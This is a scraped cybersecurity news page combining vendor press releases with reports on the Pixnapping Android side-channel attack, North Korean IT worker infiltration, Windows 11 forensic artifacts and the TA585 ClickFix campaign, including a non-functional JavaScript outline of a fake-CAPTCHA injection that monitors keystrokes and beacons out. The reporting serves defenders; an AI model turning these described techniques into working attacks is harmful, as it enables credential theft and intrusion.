Torrance, United States, October 14th, 2025, CyberNewsWire
Criminal IP at Booth J30 | Sands Expo Singapore | October 21 – 23, 2025
Criminal IP, a global cybersecurity company, announced its participation in GovWare 2025, Asia’s largest cybersecurity conference, which will be held at the Sands Expo in Singapore from October 21 to 23.
At the event, Criminal IP will showcase its flagship platform, introducing its innovative security strategies in Attack Surface Management (ASM) and Cyber Threat Intelligence (CTI) to the global market.
Strengthening Global Presence through AI-Powered ASM and CTI
Criminal IP is a security platform that combines AI-based detection technology with OSINT-based data collection capabilities and currently serves users in over 150 countries worldwide.
Notably, it integrates Attack Surface Management (ASM) and Cyber Threat Intelligence (CTI) to help organizations detect exposed external assets and proactively respond to threats linked to actual attack vectors.
Connect with the Criminal IP Team
At GovWare 2025, CEO Byungtak Kang and the global business team will engage directly with international customers and industry leaders. Key sessions and discussions will focus on the following topics:
In addition, attendees can participate in special giveaway events, including the official “Passport Event” organized by the conference host.
“GovWare is one of the most significant cybersecurity events in Asia and provides a meaningful opportunity to showcase Criminal IP’s innovative technologies,” said Byungtak Kang, CEO of AI SPERA, the company behind Criminal IP.
“We aim to demonstrate the strength of Korean cybersecurity innovation to global customers and partners while expanding our collaborative ecosystem worldwide.”
About Criminal IP
Criminal IP provides its Criminal IP ASM and CTI solutions to users in over 150 countries and has established technology alliances with more than 40 global security companies, including Cisco, Tenable, and Snowflake.
In 2025, the company reinforced its international presence through consecutive appearances at RSAC 2025, Infosecurity Europe 2025, and Interop Tokyo 2025.
Recently, the company has been expanding partnerships in key international markets, including the Middle East and Europe, positioning itself as a leading company in the global security ecosystem.
Torrance, United States, October 14th, 2025, CyberNewsWire Criminal IP at Booth J30 | Sands Expo Singapore | October 21 – 23, 2025 Criminal IP, a global cybersecurity company, announced its participation in GovWare 2025, Asia’s largest cybersecurity conference, which will be held at the Sands Expo in Singapore from October 21 to 23. At the […]
Tel Aviv, Israel, October 14th, 2025, CyberNewsWire
Sweet Security, a leader in Runtime Cloud and AI security solutions, today announced that it has been recognized as both a Cloud Security Leader and a Cloud Application Detection & Response (CADR) Leader in the 2025 Cloud Security Report by James Berthoty of ‘Latio Tech.’
The 2025 Cloud Security Report offers insights into the evolution of cloud security, tracing the shift from posture-focused tools to real-time, risk-driven platforms powered by runtime insights.
Recognizing that cloud security choices depend heavily on each organization’s architecture, team size, and security goals, Latio also acknowledges that security operations teams should be empowered with application layer insights to their running applications.
The report provides clear, actionable recommendations, structured through a decision tree to help teams design the right cloud security stack for their specific needs.
The report highlights vendors shaping the future of cloud security through innovation, visibility, and runtime-powered defense.
Sweet earned two leadership badges for its unique approach to discovering actionable findings in the cloud and for pioneering the use of AI to transform early warning signals into full attack stories.
According to Latio’s analysis, Sweet Security is built to discover actionable findings in cloud environments. Built for cloud and security operations teams, Sweet provides runtime coverage across applications, workloads, and cloud infrastructure.
By correlating misconfigurations, identity risks, vulnerabilities, and behavioral signals across the full cloud stack, Sweet empowers teams to prioritize real threats, not just surface-level alerts.
“Sweet was a clear choice as a cloud security and CADR leader as innovators bringing the power of runtime protection to practitioners,” said James Berthoty, founder and CEO of Latio Tech.
One of Sweet’s most recognized strengths is its AI capabilities that provide prioritization logic and leverage a unique detection approach that identifies suspicious behavior across the cloud stack.
This enables Sweet to turn early warning signals into full attack stories, tracing attacker activity across the cloud.
By combining these signals into a single attack narrative across different layers of the environment, Sweet gives operations teams actionable insight to protect their entire cloud.
Sweet’s key differentiators recognized in the report include:
Runtime Protection: Sweet combines runtime insight across vulnerabilities, threats, posture, and identity and extends it all the way back to developers at build time.
AI-Powered Investigation: SweetX, the company’s agentic investigator, leverages Sweet’s proprietary LLMs to infer the root cause of an incident and enable rapid response.
Robust Detections: Detect attacks as soon as they happen in cloud environments, no matter where they start.
Investigation and Response: Sweet reduces investigation time to as little as 2–5 minutes by giving analysts complete, story-like context that includes the full attack impact, visual graph and timeline, achieving a 205-minute mean time to resolution (MTTR).
Consolidating Risks and Threats: Combine high-severity posture alerts with real-time attack signals to gain a unified view of your cloud standing and what to address first.
Latio’s report also highlights Sweet’s expansion into AI SOC workflows and API-layer threat detection, which give teams visibility into their real-time attack surface and data flows across the entire cloud environment.
“We’re proud to be recognized as both a Cloud Security and CADR Leader by Latio Tech,” said Dror Kashti, CEO and co-founder of Sweet Security.
“From the start, our goal has been to go beyond alerts and give security teams real-time insight into what’s actually happening in their environments. This recognition shows that the industry is moving toward the same vision, where clarity and runtime understanding drive better cloud defense.”
About Sweet Security
Sweet Security is the leading provider of Runtime CNAPP solutions.
Powered by comprehensive runtime insights and behavioral analytics, Sweet’s unified platform correlates data across applications, workloads, and cloud infrastructure to deliver real-time detection and response, vulnerability management, posture management, identity threat protection, and API Security.
Its patent-pending LLM-powered detection engine reduces cloud detection noise to 0.04%, helping organizations achieve industry-leading MTTR benchmarks.
Privately funded, Sweet is backed by Evolution Equity Partners, Munich Re Ventures, Glilot Capital Partners, CyberArk Ventures, and an elite group of angel investors.
Pixnapping, a novel class of side-channel attacks targeting Android devices that can covertly extract sensitive screen data, including two-factor authentication (2FA) codes from Google Authenticator in under 30 seconds.
This exploit leverages Android’s core APIs and a hardware vulnerability in graphics processing units (GPUs), affecting nearly all modern Android phones without requiring special permissions, researchers said in the ACM Conference on Computer and Communications Security (CCS 2025).
Demonstrated on Google Pixel models from 6 to 9 and the Samsung Galaxy S25 running Android 13 through 16, Pixnapping bypasses traditional browser protections to snoop on both web content and native apps.
The attack’s stealthy nature raises alarms for users relying on apps like Signal, Venmo, and Gmail, as it reconstructs displayed pixels pixel-by-pixel without alerting the victim.
Pixnapping Attack
Pixnapping exploits Android’s intent system, which allows apps to launch others seamlessly, combined with stacks of semi-transparent activities that overlay victim screens.
A malicious app initiates the assault by sending an intent to open a target app, such as Google Authenticator, then layers near-invisible windows to isolate specific pixels using masking techniques.
These overlays apply blur effects via SurfaceFlinger, Android’s composition engine, creating timing variations dependent on pixel colors due to GPU data compression known as “GPU.zip.”
On Google devices, the attack measures rendering delays from Mali GPU compression, where uniform (white) pixels compress faster than varied ones, leaking color information through VSync callbacks.
For Samsung’s Galaxy S25, a variant uses multiple blur regions with varying radii to amplify these discrepancies, achieving similar results despite hardware differences.
Researchers optimized the technique for ephemeral data like 2FA codes by adapting optical character recognition (OCR)-style probing, targeting just four key pixels per digit in Google Sans font to reconstruct codes before they expire.
pixel stealing framework
The attack’s reach extends beyond 2FA to private messages in Signal, bypassing its screen security, location histories in Google Maps, and transaction details in Venmo, exposing data never before vulnerable to pixel-stealing methods.
A survey of 96,783 Google Play apps revealed that all have at least one exported activity susceptible to intents, while web analysis showed Pixnapping endangers 99.3% of top sites via Custom Tabs, far surpassing outdated iframe-based exploits.
Google assigned CVE-2025-48561 as high-severity and patched Pixel devices in September 2025, though workarounds persist, and Samsung deemed it low-severity due to implementation complexity.
To mitigate, experts recommend restricting transparent overlays via app allowlists, akin to the web’s frame-ancestors policy, and monitoring for unusual app behaviors.
Users should update devices promptly and scrutinize app installations, as this phishing-vulnerable threat underscores Android’s layered UI risks.
Affected Components
Description
Examples
Devices
Modern Android phones with Mali or similar GPUs
Google Pixel 6-9, Samsung Galaxy S25
Apps Targeted
Native and web apps displaying sensitive visuals
Google Authenticator (2FA), Signal (messages), Venmo (transactions), Gmail
Since at least 2018, a covert network of thousands of North Korean IT contractors has infiltrated global technology and infrastructure firms by masquerading as legitimate freelancers.
These operatives, operating under fabricated identities with AI-generated headshots, routinely use VPN services and “laptop farms” to disguise their geographic origins and circumvent platform verification checks.
Posing as developers, architects, and designers, they secure contracts on major freelancer platforms and enterprise portals, quietly funneling stolen credentials and sensitive data back to their handlers.
Initially identified through anomalies in VPN exit nodes and account creation patterns, the scheme gained momentum in mid-2024 when infostealer logs began revealing connections from DPRK-owned VPN clients such as NetKey.
The malware deployed on compromised workstations exfiltrates session tokens, API keys, and SSH configurations, enabling persistent access to corporate networks without raising immediate suspicion.
Kela Cyber analysts noted that many of these infostealer infections leveraged common development tools—Python, Node.js, and JetBrains IDEs—alongside bespoke loaders disguised as benign executables like Call.exe and Time.exe (Thousands-of-North-Korean-IT-Workers-Using-VPNs-and-Laptop-Farms-to-Bypass-Origin-Verification.pdf).
By blending into legitimate workflows, these operators not only evade detection but also expand the potential impact of their espionage activities.
In 2025 alone, compromised accounts surfaced on collaboration platforms such as Slack and GitLab, allowing attackers to deploy patches laced with backdoors.
Personal and sensitive data (Source – Kela Cyber)
The financial sector experienced surges in fraudulent wire transfers, while critical infrastructure projects saw unauthorized design modifications slip through code reviews—threats that underline the severity of this state-backed campaign.
Detection Evasion Tactics
A cornerstone of this operation is the use of geographically dispersed “laptop farms”—collections of remotely controlled machines that rotate through IP addresses to emulate authentic user behavior.
Upon infecting a workstation, the infostealer executes a PowerShell loader with commands resembling legitimate maintenance scripts, for example:-
This technique not only fetches the infostealer payload under the guise of routine updates but also leverages IP rotation to thwart origin-based security checks.
In tandem, operators automate identity management via browser sandboxing tools like IxBrowser, assigning unique credentials and multi-factor tokens for each persona.
These layered tactics ensure that anomalous traffic blends seamlessly with genuine developer activity, complicating forensic analysis and prolonging dwell time.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
As Microsoft pulls the plug on Windows 10 support today, October 14, 2025, organizations worldwide face a pivotal shift toward Windows 11.
Yet adoption has lagged, with Kaspersky’s Global Emergency Response Team (GERT) noting in early 2025 that the decade-old Windows 7 appeared almost as frequently in investigations as the newer OS.
With Windows 10’s end-of-life accelerating upgrades, incident responders must adapt to evolving digital footprints.
Kaspersky researchers have released a timely analysis of forensic artifact changes in Windows 11 24H2, offering investigators a roadmap to uncover evidence in this latest iteration.
Windows 11 Forensic Artifacts
At the heart of Windows 11’s innovations is the controversial Recall feature, rolled out broadly in May 2025 for devices with neural processing units (NPUs) on ARM CPUs.
Designed to let users search their activity history via AI-analyzed screenshots taken every few seconds, Recall stores raw JPEG images in %AppData%\Local\CoreAIPlatform.00\UKP{GUID}\ImageStore.
Metadata embedded in Exif tags reveals window boundaries, timestamps, titles, process paths, and even browser URIs, potentially a treasure trove for reconstructing attacker movements.
However, privacy fears persist. Disabled by default in enterprise editions, Recall’s database, primarily the encrypted SQLite file ukg.db, includes tables like App, AppDwellTime, and WindowCapture, detailing app launches, dwell times, and events such as window creations or destructions.
OCR-extracted text from screenshots populates WindowCaptureTextIndex_content, aiding in spotting sensitive data slips despite filters meant to block incognito modes or password fields.
Researchers warn that these safeguards falter, making Recall exploitable by malware to harvest credentials. A registry key under Software\Policies\Microsoft\Windows\WindowsAI\ controls its activation, underscoring the need for investigators to check for unauthorized enabling.
Beyond Recall, standard apps like Notepad now support tabs, persisting states post-termination in %LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState.
Subfolders TabState and WindowsState hold binary files with unsaved content, paths, hashes, and timestamps, ideal for recovering malicious scripts or logs from threat actors.
A companion tool, notepad_parser, automates parsing these artifacts. NTFS behaviors have shifted too. In $STANDARD_INFORMATION and $FILE_NAME attributes, actions like renaming or moving files now update access timestamps more aggressively than in Windows 10, altering inheritance patterns.
Copying or moving between volumes propagates metadata differently, demanding adjusted timelines in analyses, Kaspersky said.
Category
Windows 10 Behavior
Windows 11 Behavior (24H2)
Forensic Implications
NTFS Attributes ($STANDARD_INFORMATION)
Access timestamp updates only if system volume <128 GB; rename/move/copy behaviors preserve or inherit metadata selectively (e.g., access unchanged on rename/move within volume).
Access timestamp always updates on access/rename; copy inherits original metadata; move (intra/inter-volume) updates access to current time; rename sets access to modification time.
Timelines more dynamic; requires recalibrating artifact inheritance for file actions, potentially revealing recent manipulations more clearly.
NTFS Attributes ($FILE_NAME)
Timestamps/metadata unchanged on rename, intra-volume move via Explorer, or Recycle Bin placement.
Inherits access/modify timestamps and metadata from prior $STANDARD_INFORMATION state for these events.
Enhanced tracking of file history; useful for correlating moves/deletions but complicates reconstruction if inheritance masks originals.
Recall Feature
Not available.
Takes periodic screenshots stored as JPEGs in %AppData%\Local\CoreAIPlatform.00\UKP{GUID}\ImageStore; metadata in Exif tags; encrypted SQLite ukg.db with tables (App, WindowCapture, etc.) for events, OCR text, and app dwell times.
Goldmine for user/activity reconstruction if enabled (disabled by default in enterprise); exploitable for credential theft despite filters; check registry for activation.
Notepad Artifacts
No tab persistence; basic recent files via registry/MRU.
Tab states in %LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\ (TabState/WindowsState); binary files with content, paths, hashes, timestamps for unsaved/saved tabs.
Recovers unsaved malicious scripts/logs; parse with tools like notepad_parser; absent if tab saving disabled.
Program Compatibility Assistant (PCA)
Basic logging; no dedicated text files noted.
New files in C:\Windows\appcompat\pca: PcaAppLaunchDic.txt (launches via Explorer); PcaGeneralDb*.txt (alternating, errors/exits, UTF-16LE).
Tracks legacy app runs (e.g., malware); limited to Explorer launches; Unicode paths break ANSI file.
Windows Search Index
Single ESE database: %PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.edb (version 9180).
Three SQLite databases: Windows-gather.db (file paths via ScopeID), Windows.db (metadata in SystemIndex_1_PropertyStore, table #15), Windows-usn.db (limited value); ESE version 9400 if used.
Active feature with ActivitiesCache.db for cross-device activity.
Feature removed, but %userprofile%\AppData\Local\ConnectedDevicesPlatform\ActivitiesCache.db persists.
Legacy data available on upgrades; no new entries, but useful for historical analysis.
Registry Hives
Baseline structure with ~fewer keys/values.
Over 35,000 added/removed keys/values across hives (e.g., SOFTWARE, SYSTEM); no immediate forensic value identified.
Monitor for new keys (e.g., Recall management); ongoing research needed for significance.
Event Logs (e.g., ID 4624)
Standard logon fields.
Adds Remote Credential Guard field in Pro 22H2+.
Better authentication telemetry; aids in detecting advanced logons.
Other Security/Artifacts
NTLMv1 supported; ReFS limited (no boot); Cortana/IE active; Prefetch/LNK/Amcache/Shellbags unchanged.
NTLMv1 discontinued; ReFS bootable with BitLocker; Cortana/IE artifacts remain on upgrades; HVCI/TLS 1.3/DNS over HTTPS default; TPM 2.0 mandatory.
Reduces pass-the-hash risks; challenges NTFS-focused tools on ReFS (no $MFT); consistent artifacts ease transitions.
New Traces In Search Tools
The Program Compatibility Assistant (PCA), aiding legacy app runs since Windows Vista, logs executions in C:\Windows\appcompat\pca.
Files like PcaAppLaunchDic.txt track recent launches with UTC timestamps and paths, while PcaGeneralDb0.txt and PcaGeneralDb1.txt alternate for detailed records on errors or exits, though limited to Explorer-launched programs.
Windows Search has migrated from ESE to three SQLite databases under %PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows.
Windows-gather.db indexes files with paths reconstructible via ScopeID linkages, while Windows.db stores metadata. These enable quick malware file detection, with timestamps in FILETIME format convertible via tools like DCode.
Minor updates include ditching NTLMv1 to curb pass-the-hash attacks, removing Timeline artifacts (though databases linger), and expanding ReFS support without $MFT or short names challenging traditional NTFS forensics. Event ID 4624 now flags Remote Credential Guard in logons.
Kaspersky urges triage tools to integrate these artifacts immediately, as Windows 11’s rise promises richer incident reconstructions amid rising threats.
The cybersecurity landscape continues to face new threats as sophisticated threat actors develop increasingly complex attack methodologies.
A newly identified cybercriminal group, designated TA585, has emerged as a significant concern due to its innovative approach to malware distribution and its sophisticated web injection techniques.
This threat actor operates an entire attack chain independently, from infrastructure management to malware deployment, setting it apart from typical cybercriminal operations that rely on third-party services.
TA585 primarily utilizes MonsterV2, an advanced multi-functional malware that serves as a remote access trojan, stealer, and loader.
The malware, which costs between $800-$2000 per month on underground forums, demonstrates the professionalization of cybercrime and represents a premium threat in the current landscape.
IRS Themed ClickFix Landing leading to MonsterV2, observed on 26 February 2025 (Source – Proofpoint)
MonsterV2 avoids infecting systems in Commonwealth of Independent States countries and incorporates multiple layers of obfuscation to evade detection.
The threat actor employs a unique web injection campaign utilizing compromised legitimate websites to serve malware to targeted victims.
Unlike many other cybercriminal operations that rely on third-party traffic distribution systems, TA585 manages its own filtering mechanisms to ensure real users receive the malicious payload.
Proofpoint researchers identified this sophisticated operation in April 2025, initially tracking it under the designation “CoreSecThree” based on observed domain patterns and infrastructure characteristics.
The researchers noted the actor’s evolution from delivering Lumma Stealer to transitioning to MonsterV2 deployment in early May 2025.
Advanced Web Injection and ClickFix Technique Implementation
TA585 demonstrates remarkable sophistication in its web injection methodology, utilizing compromised legitimate websites as delivery vectors for the MonsterV2 payload.
The attack begins when threat actors inject malicious JavaScript into vulnerable websites, creating an overlay system that presents users with fake CAPTCHA verification prompts branded as “Verify you are human” messages.
‘Verification’ page owned by the threat actor (Source – Proofpoint)
The web injection technique leverages a modified version of the ClickFix methodology, originally documented by security researchers in June 2024.
This approach manipulates users into executing PowerShell commands through social engineering, presenting what appears to be a legitimate verification process.
The malicious script monitors for Windows+R key combinations from users, creating a reactive web environment that responds to user actions in real-time.
The attack chain implementation includes sophisticated filtering mechanisms that check multiple system parameters before payload delivery.
The compromised website continuously beacons to the threat actor’s infrastructure, responding with “Access denied” messages until the PowerShell script successfully completes execution and the malware establishes communication with the command and control server from the same IP address.
Once this verification occurs, users are redirected to the legitimate website with a “verified=true” parameter, maintaining the illusion of normal browsing behavior.
The technical implementation involves JavaScript code that creates dynamic overlays on compromised sites:-
// Example TA585 JavaScript injection pattern
function verifyHuman() {
// Creates fake CAPTCHA overlay
displayVerificationPrompt();
// Monitors for Win+R execution
monitorKeystrokes();
// Beacons to command server
sendBeaconRequest();
}
The payload delivery mechanism utilizes PowerShell commands that download and execute MonsterV2 directly from actor-controlled infrastructure.
The malware establishes persistence through multiple techniques, including privilege escalation attempts requesting permissions such as SeDebugPrivilege, SeTakeOwnershipPrivilege, and SeIncreaseBasePriorityPrivilege.
MonsterV2 implements a unique mutex creation system using the format “Mutant-” which serves as an effective indicator for threat hunting activities.
The malware configuration utilizes ChaCha20 encryption with embedded LibSodium libraries for secure command and control communications, demonstrating the advanced cryptographic implementations employed by modern malware authors.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
In early 2025, security researchers unveiled a sophisticated botnet implant named PolarEdge, which relies on a bespoke TLS server and a proprietary binary protocol to carry out unauthenticated command-and-control operations. PolarEdge first emerged in January 2025 when honeypots monitoring Cisco routers captured suspicious traffic exploiting CVE-2023-20118. Attackers used a crafted HTTP request with the User-Agent […]
Tel Aviv, Israel, October 14th, 2025, CyberNewsWire Sweet Security, a leader in Runtime Cloud and AI security solutions, today announced that it has been recognized as both a Cloud Security Leader and a Cloud Application Detection & Response (CADR) Leader in the 2025 Cloud Security Report by James Berthoty of ‘Latio Tech.’ The 2025 Cloud […]
A novel phishing campaign has emerged targeting Colombian users by abusing judicial notifications and weaponizing Scalable Vector Graphics (SVG) files. This sophisticated attack begins with a carefully crafted Spanish-language email impersonating the “17th Municipal Civil Court of the Bogotá Circuit,” complete with formal legal language and institutional details. The .SVG attachment named “Fiscalia General De […]
.webp)
.webp)
.webp)